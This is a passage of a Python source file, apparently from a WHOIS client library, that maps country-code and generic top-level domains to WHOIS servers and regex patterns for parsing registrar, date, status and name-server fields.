R(r\"\\nstatus:\\s?(.+)\"),\n \"_test\": \"nic.wf\",\n}\n\nZZ[\"mo\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.monic.mo\",\n \"name_servers\": R(r\"Domain name servers:\\s+-+\\s+(\\S+)\\n(?:(\\S+)\\n)?(?:(\\S+)\\n)?(?:(\\S+)\\n)?\"),\n \"creation_date\": R(r\"Record created on (.+)\"),\n \"expiration_date\": R(r\"Record expires on (.+)\"),\n \"_test\": \"monic.mo\",\n}\n\nZZ[\"tm\"] = { # Turkmenistan\n \"extend\": \"com\",\n \"domain_name\": R(r\"Domain\\s*:\\s*(.+)\"),\n \"expiration_date\": R(r\"Expiry\\s*:\\s*(\\d+-\\d+-\\d+)\"),\n \"name_servers\": R(r\"NS\\s+\\d+\\s+:\\s*(\\S+)\"),\n \"status\": R(r\"Status\\s*:\\s*(.+)\"),\n}\n\n# Venezuela\nZZ[\"ve\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.nic.ve\",\n \"domain_name\": R(r\"domain\\s*:\\s?(.+)\"),\n \"registrar\": R(r\"registrar:\\s?(.+)\"),\n # \"registrant\": R(r\"registrant:\\s?(.+)\"),\n \"creation_date\": 
R(r\"created:\\s?(.+)\"),\n \"expiration_date\": R(r\"expire:\\s?(.+)\"),\n \"updated_date\": R(r\"changed\\s*:\\s?(.+)\"),\n \"name_servers\": R(r\"nserver:\\s*(.+)\\s*\"),\n \"_test\": \"nic.ve\",\n \"registrant\": findInSplitedLookForHavingFindFirst(\n findFirst=r\"registrant:\\s?(.+)\",\n lookForStr=r\"contact:\\s*{}\\n\",\n extract=r\"org:\\s*([^\\n]*)\\n\",\n ),\n \"_split\": newLineSplit(),\n}\n\nZZ[\"lu\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.dns.lu\",\n \"domain_name\": R(r\"domainname\\s*:\\s?(.+)\"),\n \"registrar\": R(r\"registrar-name:\\s?(.+)\"),\n \"name_servers\": R(r\"nserver:\\s*(.+)\\s*\"),\n \"status\": R(r\"domaintype\\s*:\\s*(.+)\"),\n \"registrant_country\": R(r\"org-country\\s*:\\s?(.+)\"),\n \"_test\": \"dns.lu\",\n}\n\nZZ[\"sm\"] = {\n \"extend\": \"rs\",\n \"_server\": \"whois.nic.sm\",\n \"domain_name\": R(r\"Domain Name:\\s+(.+)\"),\n \"status\": R(r\"Status:\\s(.+)\"),\n \"name_servers\": R(r\"DNS Servers:\\s+(.+)\"),\n \"_test\": \"nic.sm\",\n}\n\nZZ[\"tg\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.nic.tg\",\n \"domain_name\": R(r\"domain:\\.+\\s?(.+)\"),\n \"registrar\": R(r\"registrar:\\.+\\s?(.+)\"),\n \"creation_date\": R(r\"Activation:\\.+\\s?(.+)\"),\n \"expiration_date\": R(r\"Expiration:\\.+\\s?(.+)\"),\n \"status\": R(r\"Status:\\.+\\s?(.+)\"),\n \"name_servers\": R(r\"Name Server \\(DB\\):\\.+(.+)\"),\n \"_test\": \"nic.tg\",\n}\n\nZZ[\"md\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.nic.md\",\n \"domain_name\": R(r\"domain\\s+name:\\s?(.+)\"),\n \"status\": R(r\"domain\\s+state:\\s?(.+)\"),\n \"name_servers\": R(r\"Nameserver:(.+)\"),\n \"registrar\": R(r\"Registrar:\\s?(.+)\"),\n \"creation_date\": R(r\"Registered\\s+on:\\s?(.+)\"),\n \"expiration_date\": R(r\"Expires\\s+on:\\s?(.+)\"),\n \"_test\": \"nic.md\",\n}\n\nZZ[\"tg\"] = {\n \"_server\": \"whois.nic.tg\",\n \"extend\": \"com\",\n \"_test\": \"nic.tg\",\n \"domain_name\": R(r\"domain:\\.+\\s?(.+)\"),\n \"registrar\": R(r\"registrar:\\.+\\s?(.+)\"),\n \"creation_date\": R(r\"Activation:\\.+\\s?(.+)\"),\n \"expiration_date\": R(r\"Expiration:\\.+\\s?(.+)\"),\n \"status\": R(r\"Status:\\.+\\s?(.+)\"),\n \"name_servers\": R(r\"Name Server \\(DB\\):\\.+(.+)\"),\n}\nZZ[\"au\"] = {\n \"extend\": \"com\",\n \"registrar\": R(r\"Registrar Name:\\s?(.+)\"),\n \"updated_date\": R(r\"Last Modified:([^\\n]*)\"),\n \"registrant\": r\"Registrant:\\s*([^\\n]*)\\n\",\n}\n\n# ======================================\n# ======================================\n# ======================================\n\nZZ[\"aarp\"] = {\"_server\": \"whois.nic.aarp\", \"extend\": \"com\", \"_test\": \"nic.aarp\"}\nZZ[\"abbott\"] = {\"_server\": \"whois.nic.abbott\", \"extend\": \"com\", \"_test\": \"nic.abbott\"}\nZZ[\"abbvie\"] = {\"_server\": \"whois.nic.abbvie\", \"extend\": \"com\", \"_test\": \"nic.abbvie\"}\nZZ[\"abc\"] = {\"_server\": \"whois.nic.abc\", \"extend\": \"com\", \"_test\": \"nic.abc\"}\nZZ[\"abogado\"] = {\"_server\": \"whois.nic.abogado\", \"extend\": \"com\", \"_test\": \"nic.abogado\"}\nZZ[\"abudhabi\"] = {\"_server\": \"whois.nic.abudhabi\", \"extend\": \"com\", \"_test\": \"nic.abudhabi\"}\nZZ[\"academy\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"ac.bd\"] = {\"extend\": \"bd\"}\nZZ[\"accountant\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.accountant\", \"_test\": \"nic.accountant\"}\nZZ[\"accountants\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"ac.jp\"] = {\"extend\": \"co.jp\", \"_test\": 
\"icu.ac.jp\"}\nZZ[\"ac.ke\"] = {\"extend\": \"ke\"}\nZZ[\"aco\"] = {\"_server\": \"whois.nic.aco\", \"extend\": \"com\", \"_test\": \"nic.aco\"}\nZZ[\"ac.rw\"] = {\"extend\": \"rw\"}\nZZ[\"ac.th\"] = {\"extend\": \"co.th\", \"_test\": \"chula.ac.th\"}\nZZ[\"actor\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"ac.ug\"] = {\"extend\": \"ug\", \"_privateRegistry\": True}\nZZ[\"ad.jp\"] = {\"extend\": \"co.jp\", \"_test\": \"nic.ad.jp\"}\nZZ[\"ads\"] = {\"_server\": \"whois.nic.ads\", \"extend\": \"com\", \"_test\": \"nic.ads\"}\nZZ[\"adult\"] = {\"_server\": \"whois.nic.adult\", \"extend\": \"com\", \"_test\": \"nic.adult\"}\nZZ[\"aeg\"] = {\"_server\": \"whois.nic.aeg\", \"extend\": \"com\", \"_test\": \"nic.aeg\"}\nZZ[\"aero\"] = {\"extend\": \"ac\", \"_server\": \"whois.aero\", \"registrant_country\": R(r\"Registrant\\s+Country:\\s+(.+)\")}\nZZ[\"af\"] = {\"extend\": \"ac\"}\nZZ[\"com.af\"] = {\"extend\": \"af\"}\nZZ[\"afl\"] = {\"_server\": \"whois.nic.afl\", \"extend\": \"com\", \"_test\": \"nic.afl\"}\nZZ[\"africa\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.africa\", \"_test\": \"nic.africa\"}\nZZ[\"agakhan\"] = {\"_server\": \"whois.nic.agakhan\", \"extend\": \"com\", \"_test\": \"nic.agakhan\"}\nZZ[\"agency\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"ag\"] = {\"extend\": \"ac\"}\nZZ[\"com.ag\"] = {\"extend\": \"ac\"}\n\nZZ[\"ai\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.ai\"} # Anguill, \"_test\": \"nic.ai\"}\nZZ[\"airbus\"] = {\"_server\": \"whois.nic.airbus\", \"extend\": \"com\", \"_test\": \"nic.airbus\"}\nZZ[\"airforce\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"airtel\"] = {\"_server\": \"whois.nic.airtel\", \"extend\": \"com\", \"_test\": \"nic.airtel\"}\nZZ[\"akdn\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\", \"_test\": \"nic.akdn\"}\nZZ[\"al\"] = {\"extend\": \"_privateReg\"}\nZZ[\"alibaba\"] = {\"_server\": \"whois.nic.alibaba\", \"extend\": \"com\", \"_test\": \"nic.alibaba\"}\nZZ[\"alipay\"] = {\"_server\": \"whois.nic.alipay\", \"extend\": \"com\", \"_test\": \"nic.alipay\"}\nZZ[\"allfinanz\"] = {\"_server\": \"whois.nic.allfinanz\", \"extend\": \"com\", \"_test\": \"nic.allfinanz\"}\nZZ[\"allstate\"] = {\"_server\": \"whois.nic.allstate\", \"extend\": \"com\", \"_test\": \"nic.allstate\"}\nZZ[\"ally\"] = {\"_server\": \"whois.nic.ally\", \"extend\": \"com\", \"_test\": \"nic.ally\"}\nZZ[\"alsace\"] = {\"_server\": \"whois.nic.alsace\", \"extend\": \"com\", \"_test\": \"nic.alsace\"}\nZZ[\"alstom\"] = {\"_server\": \"whois.nic.alstom\", \"extend\": \"com\", \"_test\": \"nic.alstom\"}\nZZ[\"amazon\"] = {\"_server\": \"whois.nic.amazon\", \"extend\": \"com\", \"_test\": \"nic.amazon\"}\nZZ[\"americanfamily\"] = {\"_server\": \"whois.nic.americanfamily\", \"extend\": \"com\", \"_test\": \"nic.americanfamily\"}\nZZ[\"amfam\"] = {\"_server\": \"whois.nic.amfam\", \"extend\": \"com\", \"_test\": \"nic.amfam\"}\nZZ[\"android\"] = {\"_server\": \"whois.nic.android\", \"extend\": \"com\", \"_test\": \"nic.android\"}\nZZ[\"anquan\"] = {\"extend\": \"_teleinfo\", \"_server\": \"whois.teleinfo.cn\"}\nZZ[\"anz\"] = {\"_server\": \"whois.nic.anz\", \"extend\": \"com\", \"_test\": \"nic.anz\"}\nZZ[\"aol\"] = {\"_server\": \"whois.nic.aol\", \"extend\": \"com\", \"_test\": \"nic.aol\"}\nZZ[\"apartments\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"app\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.google\"}\nZZ[\"apple\"] = {\"_server\": 
\"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"aquarelle\"] = {\"_server\": \"whois.nic.aquarelle\", \"extend\": \"com\", \"_test\": \"nic.aquarelle\"}\nZZ[\"arab\"] = {\"_server\": \"whois.nic.arab\", \"extend\": \"com\", \"_test\": \"nic.arab\"}\nZZ[\"archi\"] = {\"_server\": \"whois.nic.archi\", \"extend\": \"com\", \"_test\": \"nic.archi\"}\nZZ[\"army\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"arte\"] = {\"_server\": \"whois.nic.arte\", \"extend\": \"com\", \"_test\": \"nic.arte\"}\nZZ[\"art\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"asda\"] = {\"_server\": \"whois.nic.asda\", \"extend\": \"com\", \"_test\": \"nic.asda\"}\nZZ[\"as\"] = {\"extend\": \"gg\"}\nZZ[\"asia\"] = {\"extend\": \"com\"}\nZZ[\"associates\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"attorney\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"auction\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"audible\"] = {\"_server\": \"whois.nic.audible\", \"extend\": \"com\", \"_test\": \"nic.audible\"}\nZZ[\"audio\"] = {\"extend\": \"_uniregistry\", \"_server\": \"whois.uniregistry.net\"}\nZZ[\"audi\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"auspost\"] = {\"_server\": \"whois.nic.auspost\", \"extend\": \"com\", \"_test\": \"nic.auspost\"}\nZZ[\"author\"] = {\"_server\": \"whois.nic.author\", \"extend\": \"com\", \"_test\": \"nic.author\"}\nZZ[\"auto\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"autos\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"avianca\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"aw\"] = {\"extend\": \"nl\", \"name_servers\": R(r\"Domain nameservers.*:\\n%s\" % xStr(r\"(?:\\s+(\\S+)\\n)?\", 4))}\nZZ[\"aws\"] = {\"_server\": \"whois.nic.aws\", \"extend\": \"com\", \"_test\": \"nic.aws\"}\nZZ[\"az\"] = {\"extend\": \"_privateReg\"}\nZZ[\"baby\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"ba\"] = {\"extend\": \"_privateReg\"}\nZZ[\"baidu\"] = {\"_server\": \"whois.gtld.knet.cn\", \"extend\": \"com\", \"_test\": \"nic.baidu\"}\nZZ[\"band\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"barcelona\"] = {\"_server\": \"whois.nic.barcelona\", \"extend\": \"com\", \"_test\": \"nic.barcelona\"}\nZZ[\"barclaycard\"] = {\"_server\": \"whois.nic.barclaycard\", \"extend\": \"com\", \"_test\": \"nic.barclaycard\"}\nZZ[\"barclays\"] = {\"_server\": \"whois.nic.barclays\", \"extend\": \"com\", \"_test\": \"nic.barclays\"}\nZZ[\"barefoot\"] = {\"_server\": \"whois.nic.barefoot\", \"extend\": \"com\", \"_test\": \"nic.barefoot\"}\nZZ[\"bar\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"bargains\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"basketball\"] = {\"_server\": \"whois.nic.basketball\", \"extend\": \"com\", \"_test\": \"nic.basketball\"}\nZZ[\"bauhaus\"] = {\"_server\": \"whois.nic.bauhaus\", \"extend\": \"com\", \"_test\": \"nic.bauhaus\"}\nZZ[\"bayern\"] = {\"_server\": \"whois.nic.bayern\", \"extend\": \"com\", \"_test\": \"nic.bayern\"}\nZZ[\"bbc\"] = {\"_server\": \"whois.nic.bbc\", \"extend\": \"com\", \"_test\": \"nic.bbc\"}\nZZ[\"bbt\"] = {\"_server\": \"whois.nic.bbt\", \"extend\": \"com\", \"_test\": \"nic.bbt\"}\nZZ[\"bbva\"] = {\"_server\": \"whois.nic.bbva\", \"extend\": \"com\", \"_test\": \"nic.bbva\"}\nZZ[\"bcg\"] = 
{\"_server\": \"whois.nic.bcg\", \"extend\": \"com\", \"_test\": \"nic.bcg\"}\nZZ[\"bcn\"] = {\"_server\": \"whois.nic.bcn\", \"extend\": \"com\", \"_test\": \"nic.bcn\"}\nZZ[\"bd\"] = {\"extend\": \"_privateReg\"} # Bangladesh\nZZ[\"beats\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"beauty\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"beer\"] = {\"_server\": \"whois.nic.beer\", \"extend\": \"com\", \"_test\": \"nic.beer\"}\nZZ[\"bentley\"] = {\"_server\": \"whois.nic.bentley\", \"extend\": \"com\", \"_test\": \"nic.bentley\"}\nZZ[\"berlin\"] = {\"_server\": \"whois.nic.berlin\", \"extend\": \"com\", \"_test\": \"nic.berlin\"}\nZZ[\"bestbuy\"] = {\"_server\": \"whois.nic.bestbuy\", \"extend\": \"com\", \"_test\": \"nic.bestbuy\"}\nZZ[\"best\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"bet\"] = {\"extend\": \"ac\", \"_server\": \"whois.nic.bet\", \"_test\": \"nic.bet\"}\nZZ[\"bf\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.bf\", \"registrant\": R(r\"Registrant Name:\\s?(.+)\"), \"_test\": \"nic.bf\"}\nZZ[\"bible\"] = {\"_server\": \"whois.nic.bible\", \"extend\": \"com\", \"_test\": \"nic.bible\"}\nZZ[\"bid\"] = {\"extend\": \"ac\", \"_server\": \"whois.nic.bid\", \"_test\": \"nic.bid\"}\nZZ[\"bike\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"bingo\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"bio\"] = {\"_server\": \"whois.nic.bio\", \"extend\": \"com\", \"_test\": \"nic.bio\"}\nZZ[\"bi\"] = {\"_server\": \"whois1.nic.bi\", \"extend\": \"com\"}\nZZ[\"blackfriday\"] = {\"extend\": \"_uniregistry\", \"_server\": \"whois.uniregistry.net\"}\nZZ[\"black\"] = {\"_server\": \"whois.nic.black\", \"extend\": \"com\", \"_test\": \"nic.black\"}\nZZ[\"blockbuster\"] = {\"_server\": \"whois.nic.blockbuster\", \"extend\": \"com\", \"_test\": \"nic.blockbuster\"}\nZZ[\"blog\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"blue\"] = {\"extend\": \"com\"}\nZZ[\"bms\"] = {\"_server\": \"whois.nic.bms\", \"extend\": \"com\", \"_test\": \"nic.bms\"}\nZZ[\"bmw\"] = {\"_server\": \"whois.nic.bmw\", \"extend\": \"com\", \"_test\": \"nic.bmw\"}\nZZ[\"bnpparibas\"] = {\"_server\": \"whois.nic.bnpparibas\", \"extend\": \"com\", \"_test\": \"group.bnpparibas\"}\nZZ[\"boats\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"boehringer\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"bofa\"] = {\"_server\": \"whois.nic.bofa\", \"extend\": \"com\", \"_test\": \"nic.bofa\"}\nZZ[\"bom\"] = {\"extend\": \"com\", \"_server\": \"whois.gtlds.nic.br\"}\nZZ[\"bond\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"book\"] = {\"_server\": \"whois.nic.book\", \"extend\": \"com\", \"_test\": \"nic.book\"}\nZZ[\"boo\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"bosch\"] = {\"_server\": \"whois.nic.bosch\", \"extend\": \"com\", \"_test\": \"nic.bosch\"}\nZZ[\"bostik\"] = {\"_server\": \"whois.nic.bostik\", \"extend\": \"com\", \"_test\": \"nic.bostik\"}\nZZ[\"boston\"] = {\"_server\": \"whois.nic.boston\", \"extend\": \"com\", \"_test\": \"nic.boston\"}\nZZ[\"bot\"] = {\"_server\": \"whois.nic.bot\", \"extend\": \"com\", \"_test\": \"nic.bot\"}\nZZ[\"boutique\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"box\"] = {\"_server\": \"whois.nic.box\", \"extend\": \"com\", \"_test\": \"nic.box\"}\nZZ[\"bradesco\"] = {\"_server\": 
\"whois.nic.bradesco\", \"extend\": \"com\", \"_test\": \"nic.bradesco\"}\nZZ[\"bridgestone\"] = {\"_server\": \"whois.nic.bridgestone\", \"extend\": \"com\", \"_test\": \"nic.bridgestone\"}\nZZ[\"broadway\"] = {\"_server\": \"whois.nic.broadway\", \"extend\": \"com\", \"_test\": \"nic.broadway\"}\nZZ[\"broker\"] = {\"_server\": \"whois.nic.broker\", \"extend\": \"com\", \"_test\": \"nic.broker\"}\nZZ[\"brother\"] = {\"_server\": \"whois.nic.brother\", \"extend\": \"com\", \"_test\": \"nic.brother\"}\nZZ[\"brussels\"] = {\"_server\": \"whois.nic.brussels\", \"extend\": \"com\", \"_test\": \"nic.brussels\"}\nZZ[\"builders\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"build\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"business\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"buy\"] = {\"_server\": \"whois.nic.buy\", \"extend\": \"com\", \"_test\": \"nic.buy\"}\nZZ[\"buzz\"] = {\"extend\": \"amsterdam\"}\nZZ[\"bz\"] = {\"extend\": \"_privateReg\"}\nZZ[\"cab\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"ca\"] = {\"extend\": \"com\"}\nZZ[\"cafe\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"call\"] = {\"_server\": \"whois.nic.call\", \"extend\": \"com\", \"_test\": \"nic.call\"}\nZZ[\"cal\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"camera\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"cam\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"camp\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"canon\"] = {\"_server\": \"whois.nic.canon\", \"extend\": \"com\", \"_test\": \"nic.canon\"}\nZZ[\"capetown\"] = {\"_server\": \"whois.nic.capetown\", \"extend\": \"com\", \"_test\": \"nic.capetown\"}\nZZ[\"capital\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"capitalone\"] = {\"_server\": \"whois.nic.capitalone\", \"extend\": \"com\", \"_test\": \"nic.capitalone\"}\nZZ[\"cards\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"career\"] = {\"_server\": \"whois.nic.career\", \"extend\": \"com\", \"_test\": \"nic.career\"}\nZZ[\"careers\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"care\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"car\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"cars\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"casa\"] = {\"extend\": \"ac\", \"registrant_country\": R(r\"Registrant Country:\\s+(.+)\")}\nZZ[\"case\"] = {\"_server\": \"whois.nic.case\", \"extend\": \"com\", \"_test\": \"nic.case\"}\nZZ[\"cash\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"casino\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"catering\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"cat\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.cat\", \"_test\": \"nic.cat\"}\nZZ[\"catholic\"] = {\"_server\": \"whois.nic.catholic\", \"extend\": \"com\", \"_test\": \"nic.catholic\"}\nZZ[\"ca.ug\"] = {\"extend\": \"ug\"}\nZZ[\"cba\"] = {\"_server\": \"whois.nic.cba\", \"extend\": \"com\", \"_test\": \"nic.cba\"}\nZZ[\"cbs\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"cd\"] = {\"extend\": \"ac\", \"_server\": \"whois.nic.cd\", \"registrant_country\": R(r\"Registrant\\s+Country:\\s+(.+)\"), \"_test\": \"nic.cd\"}\nZZ[\"center\"] = 
{\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"ceo\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"cern\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"cfa\"] = {\"_server\": \"whois.nic.cfa\", \"extend\": \"com\", \"_test\": \"nic.cfa\"}\nZZ[\"cfd\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"chanel\"] = {\"_server\": \"whois.nic.chanel\", \"extend\": \"com\", \"_test\": \"nic.chanel\"}\nZZ[\"channel\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"charity\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.nic.charity\", \"_test\": \"nic.charity\"}\nZZ[\"chat\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"cheap\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"ch\"] = {\"extend\": \"_privateReg\"}\nZZ[\"chintai\"] = {\"_server\": \"whois.nic.chintai\", \"extend\": \"com\", \"_test\": \"nic.chintai\"}\nZZ[\"christmas\"] = {\"extend\": \"_uniregistry\", \"_server\": \"whois.uniregistry.net\"}\nZZ[\"chrome\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"church\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"cipriani\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"circle\"] = {\"_server\": \"whois.nic.circle\", \"extend\": \"com\", \"_test\": \"nic.circle\"}\nZZ[\"ci\"] = {\"_server\": \"whois.nic.ci\", \"extend\": \"com\", \"_test\": \"nic.ci\"}\nZZ[\"cityeats\"] = {\"_server\": \"whois.nic.cityeats\", \"extend\": \"com\", \"_test\": \"nic.cityeats\"}\nZZ[\"city\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"claims\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"cleaning\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"click\"] = {\"extend\": \"com\"}\nZZ[\"clinic\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"clinique\"] = {\"_server\": \"whois.nic.clinique\", \"extend\": \"com\", \"_test\": \"nic.clinique\"}\nZZ[\"clothing\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"cloud\"] = {\"extend\": \"com\"}\nZZ[\"club\"] = {\"extend\": \"com\"}\nZZ[\"clubmed\"] = {\"_server\": \"whois.nic.clubmed\", \"extend\": \"com\", \"_test\": \"nic.clubmed\"}\nZZ[\"cm\"] = {\"extend\": \"com\"}\nZZ[\"coach\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"codes\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"co\"] = {\"extend\": \"biz\", \"status\": R(r\"Status:\\s?(.+)\")}\nZZ[\"coffee\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"co.ke\"] = {\"extend\": \"ke\"}\nZZ[\"college\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"cologne\"] = {\"_server\": \"whois.ryce-rsp.com\", \"extend\": \"com\"}\nZZ[\"com.au\"] = {\"extend\": \"au\"}\nZZ[\"com.bd\"] = {\"extend\": \"bd\"}\nZZ[\"com.bo\"] = {\"extend\": \"bo\"}\nZZ[\"comcast\"] = {\"_server\": \"whois.nic.comcast\", \"extend\": \"com\", \"_test\": \"nic.comcast\"}\nZZ[\"com.cn\"] = {\"extend\": \"cn\"}\nZZ[\"com.do\"] = {\"extend\": \"_privateReg\"}\nZZ[\"com.ec\"] = {\"extend\": \"ec\"}\nZZ[\"com.eg\"] = {\"extend\": \"_privateReg\"} # Egipt\nZZ[\"com.ly\"] = {\"extend\": \"ly\"}\nZZ[\"commbank\"] = {\"_server\": \"whois.nic.commbank\", \"extend\": \"com\", \"_test\": \"nic.commbank\"}\nZZ[\"com.mo\"] = {\"extend\": \"mo\"}\nZZ[\"community\"] = {\"extend\": \"_donuts\", \"_server\": 
\"whois.donuts.co\"}\nZZ[\"com.np\"] = {\"extend\": \"np\"}\nZZ[\"company\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"compare\"] = {\"_server\": \"whois.nic.compare\", \"extend\": \"com\", \"_test\": \"nic.compare\"}\nZZ[\"com.ph\"] = {\"extend\": \"ph\"}\nZZ[\"computer\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"com.py\"] = {\"extend\": \"_privateReg\"}\nZZ[\"com.ru\"] = {\"extend\": \"ru\", \"_server\": \"whois.nic.ru\", \"_test\": \"mining.com.ru\"}\nZZ[\"comsec\"] = {\"_server\": \"whois.nic.comsec\", \"extend\": \"com\", \"_test\": \"nic.comsec\"}\nZZ[\"com.tm\"] = {\"extend\": \"tm\", \"_privateRegistry\": True}\nZZ[\"com.tw\"] = {\"extend\": \"tw\"}\nZZ[\"com.ua\"] = {\"extend\": \"ua\"}\nZZ[\"com.ve\"] = {\"extend\": \"ve\"}\nZZ[\"com.zw\"] = {\"extend\": \"zw\"}\nZZ[\"condos\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"construction\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"consulting\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"contact\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"contractors\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"cooking\"] = {\"_server\": \"whois.nic.cooking\", \"extend\": \"com\", \"_test\": \"nic.cooking\"}\nZZ[\"cool\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"coop\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"coop.rw\"] = {\"extend\": \"rw\"}\nZZ[\"corsica\"] = {\"_server\": \"whois.nic.corsica\", \"extend\": \"com\", \"_test\": \"nic.corsica\"}\nZZ[\"co.rw\"] = {\"extend\": 